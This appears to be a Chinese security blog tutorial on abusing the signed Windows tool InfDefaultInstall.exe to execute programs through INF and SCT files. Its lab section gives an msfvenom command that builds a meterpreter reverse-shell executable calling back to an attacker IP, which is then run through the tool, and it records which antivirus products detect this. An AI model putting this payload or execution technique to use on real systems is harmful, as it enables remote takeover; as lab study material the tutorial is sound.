当你的才华
还撑不起你的野心时
那你就应该静下心来学习
目录
0x02 利用InfDefaultInstall.exe执行程序
0x03 利用InfDefaultInstall.exe执行payload
0x01 InfDefaultInstall.exe简介
InfDefaultInstall.exe是一个用来进行inf安装的工具,具有微软签名,存在路径为:
C:\Windows\System32\Infdefaultinstall.exe
C:\Windows\SysWOW64\Infdefaultinstall.exe
我们可以通过直接该文件后面跟inf文件来进行绕过一些限制
0x02 利用InfDefaultInstall.exe执行程序
Poc地址如下:https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
在本机进行示例,以下为shady2.inf的代码
以下为shady.sct的代码,可以看到最后是调出notepad.exe的
在cmd窗口中运行
InfDefaultInstall.exe "C:\Users\Administrator\Desktop\inf_catalog_signing_poc-master\shady\shady 2.inf"
0x03 利用InfDefaultInstall.exe执行payload
靶机:windows 10 ip地址:172.16.111.194
攻击机:kali linux ip地址:172.16.111.222
首先使用msf生成exe格式的shellcode
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=172.16.111.222 lport=3333 -f exe > ./hacker.exe
将生成的exe木马复制到靶机,备份一份shady222.inf并更改shady.sct中的文件路径为hacker.exe
在msf中设置监听
靶机中使用InfDefaultInstall.exe运行shady222.inf
攻击机kali成功监听到靶机上线
以下为靶机安装360全家桶和火绒杀毒后的InfDefaultInstall.exe执行效果:360全家桶报毒,kali无法监听。
火绒报毒,kali无法监听。
参考链接:
https://medium.com/@KyleHanslovan/re-evading-autoruns-pocs-on-windows-10-dd810d7e8a3f
虽然我们生活在阴沟里,但依然有人仰望星空!